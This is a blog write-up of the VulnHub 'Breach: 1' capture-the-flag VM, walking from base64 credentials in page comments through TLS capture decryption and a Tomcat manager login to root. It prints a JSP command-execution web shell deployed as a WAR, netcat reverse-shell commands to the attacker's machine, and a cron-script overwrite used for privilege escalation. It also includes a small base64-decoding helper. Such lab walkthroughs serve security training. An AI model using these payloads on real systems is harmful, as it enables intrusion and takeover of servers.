vulnhub - BREACH: 1

Posted by Mar10 on 2024-06-13

Description

As the first in a multi-part series, Breach 1.0 is meant to be a beginner-to-intermediate boot2root/CTF challenge. Solving it will take a combination of solid information gathering and persistence. Leave no stone unturned.
The VM is configured with a static IP address (192.168.110.140), so you will need to configure your host-only adapter to this subnet.
Many thanks to knightmare and rastamouse for testing and feedback.
Thanks to g0tmi1k for maintaining #vulnhub and hosting my first challenge.
If you run into any problems, you can find me on Twitter: https://twitter.com/mrb3n813 or on IRC in #vulnhub.
Looking forward to the write-ups, especially any unintended local/root paths.

Environment setup

Change this setting to

image-20240605202633903

Switch it to host-only mode; Kali needs the same change

image-20240605202743631

After a reboot, the corresponding network adapter configuration appears, which means the setup succeeded

image-20240606020807050

Information gathering - port 80

An nmap port scan shows every port as open, so focus first on the commonly used ports

Visit the web page and view the source

<!DOCTYPE html>

<html>
<head>
<title>Welcome to Breach 1.0</title>
</head>

<body bgcolor="#000000">

<font color="green">
<p>Initech was breached and the board of directors voted to bring in their internal Initech Cyber Consulting, LLP division to assist. Given the high profile nature of the breach and nearly catastrophic losses, there have been many subsequent attempts against the company. Initech has tasked their TOP consultants, led by Bill Lumbergh, CISSP and Peter Gibbons, C|EH, SEC+, NET+, A+ to contain and perform analysis on the breach.</p> 

<p>Little did the company realize that the breach was not the work of skilled hackers, but a parting gift from a disgruntled former employee on his way out. The TOP consultants have been hard at work containing the breach. 
However, their own work ethics and the mess left behind may be the company's downfall.</p>

<center><a href="initech.html" target="_blank"> <img src="/images/milton_beach.jpg" 
width=500 height=500> </a></center>


<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

</body>
</html>

The comment gives us something: decoding it twice with base64 yields a username and password

pgibbons:damnitfeel$goodtobeagang$ta

There is also a link pointing to 192.168.110.140/initech.html, whose source contains a comment

<!--I'm sitting on a beach reading your email! -->

Clicking Employee portal redirects to http://192.168.110.140/impresscms/user.php

Fingerprinting

image-20240606021807476

There is a login form; try logging in with the credentials we just obtained

After logging in successfully there are three emails

From ImpressCMS Admin

Posting sensitive content 

Peter, yeahhh, I'm going to have to go ahead and ask you to have your team only post any sensitive artifacts to the admin portal. My password is extremely secure. If you could go ahead and tell them all that'd be great. -Bill 

From Michael Bolton

IDS/IPS system

Hey Peter,

I got a really good deal on an IDS/IPS system from a vendor I met at that happy hour at Chotchkie's last week!

-Michael

From ImpressCMS Admin

FWD: Thank you for your purchase of Super Secret Cert Pro!

Peter, I am not sure what this is. I saved the file here: 192.168.110.140/.keystore

Bob

----------------------------------------------------------------------
From: registrar@penetrode.com
Sent: 02 June 2016 16:16
To: bob@initech.com; admin@breach.local
Subject: Thank you for your purchase of Super Secret Cert Pro!

Please find attached your new SSL certificate. Do not share this with anyone!

This email mentions 192.168.110.140/.keystore; combined with the SSL certificate mentioned further down, it should be the SSL certificate (a Java keystore)

But there is nowhere to import and use it yet, so use the search box and search for SSL

SSL implementation test capture

Team - I have uploaded a pcap file of our red team's re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out.

http://192.168.110.140/impresscms/_SSL_test_phase1.pcap

They told me the alias, storepassword and keypassword are all set to 'tomcat'. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now?

-Peter

p.s. I'm going fishing for the next 2 days and will not have access to email or phone.

Sure enough, the search finds an email telling us there is a packet capture, and that the alias, store password and key password are all set to "tomcat"

List the certificates and keys stored in the keystore file named "keystore"

keytool -list -keystore keystore

image-20240606141410074

keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12

Convert the keystore to the format Wireshark needs (PKCS12), then open the capture

Edit -> Preferences -> Protocols -> TLS -> RSA keys list, click the key file field and add it

image-20240606211231201

Looking through the contents of each stream

<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>

This gives us a username and password

Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC

Base64-decoding gives tomcat:Tt\5D8F(#!*u=G)4m7zB, which should also be a set of credentials

There is also a suspicious page, https://192.168.110.140:8443/_M@nag3Me/html, which has to be visited through an intercepting proxy to capture the requests
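As an added example (not part of the original write-up), a small Python helper from the defender's side that does what the two manual decoding steps above do: it scans HTML comments for base64-wrapped strings, peels nested layers, and decodes a Basic-auth header value. The sample HTML below is constructed from the comment shown on the landing page.

```python
"""Spot base64-wrapped secrets hidden in HTML comments or Basic-auth headers."""
import base64
import binascii
import re

# Constructed sample modelled on the Breach: 1 landing page comment.
SAMPLE_HTML = """<html><body>
<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
<!-- I'm sitting on a beach reading your email! -->
</body></html>"""


def _as_text(raw: bytes):
    """Return raw as str if it is printable ASCII, otherwise None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def peel_base64(token: str, max_layers: int = 8):
    """Strip nested base64 layers until the payload is no longer valid base64
    or no longer printable text. Returns every layer, input first."""
    layers = [token]
    for _ in range(max_layers):
        try:
            raw = base64.b64decode(layers[-1], validate=True)
        except (binascii.Error, ValueError):
            break
        text = _as_text(raw)
        if not text:
            break
        layers.append(text)
    return layers


def find_encoded_comments(html: str):
    """Return (token, layers) for every HTML comment that peels to something
    other than itself. Padding dashes around the comment body are stripped."""
    hits = []
    for body in re.findall(r"<!--(.*?)-->", html, flags=re.S):
        token = body.strip().strip("-").strip()
        layers = peel_base64(token)
        if len(layers) > 1:
            hits.append((token, layers))
    return hits


def decode_basic_auth(header_value: str):
    """Decode an 'Authorization: Basic <b64>' value into (user, password)."""
    scheme, _, b64 = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(b64).decode("utf-8").partition(":")
    return user, password
```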

Information gathering - port 8443

Accessing it prompts for a username and password

image-20240606212202413

tomcat:Tt\5D8F(#!*u=G)4m7zB logs in successfully

Fingerprinting

image-20240606212416587

There is a file upload point that accepts WAR packages

image-20240606212804483

Package shell.jsp into a WAR

<%
Runtime.getRuntime().exec(request.getParameter("shell"));
%>

Put shell.jsp alone in a directory and cd into that directory on the command line

jar -cvf Login.war shell.jsp

Access the file at https://192.168.110.140:8443/shell/shell.jsp. A scheduled task deletes uploaded files, so go for a reverse shell instead

nc -v 192.168.110.128 8888 -e /bin/bash

image-20240606223044987

Upgrade to an interactive shell

python -c 'import pty;pty.spawn("/bin/sh")'

Check /etc/passwd and note the following two users

milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

Looking further for suspicious files, /var/www/5446 contains two PHP files

image-20240606223541601

Viewing them gives the MySQL credentials

// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );

// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );

Log in directly

mysql -u root -p

Query the tables

image-20240606230105409

image-20240606230018493

This gives user milton's password hash; crack the MD5

image-20240606230229617

The password is thelaststraw

Logging in as milton, however, gives no way to escalate privileges

$ su milton
su milton
Password: thelaststraw

milton@Breach:/var/www/5446$ sudo -l
sudo -l
[sudo] password for milton: thelaststraw

Sorry, user milton may not run sudo on Breach.

Looking everywhere for traces..

image-20240606230956644

Two images have different permissions from the rest; download them to the local machine

image-20240606231451799

Inspect them with exiftool

image-20240606231541555

bill.png indeed holds some information; after trying it, it turns out to be user blumbergh's password

Log in and check the available privilege-escalation routes

image-20240606231925532

Found the corresponding privilege-escalation command

image-20240606232109200

So spawn another reverse shell

echo nc -v 192.168.110.128 7777 -e /bin/bash | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

Note! Do not run the script yourself right away; doing so makes the escalation fail. Wait for it to be triggered on its own

image-20240606232630419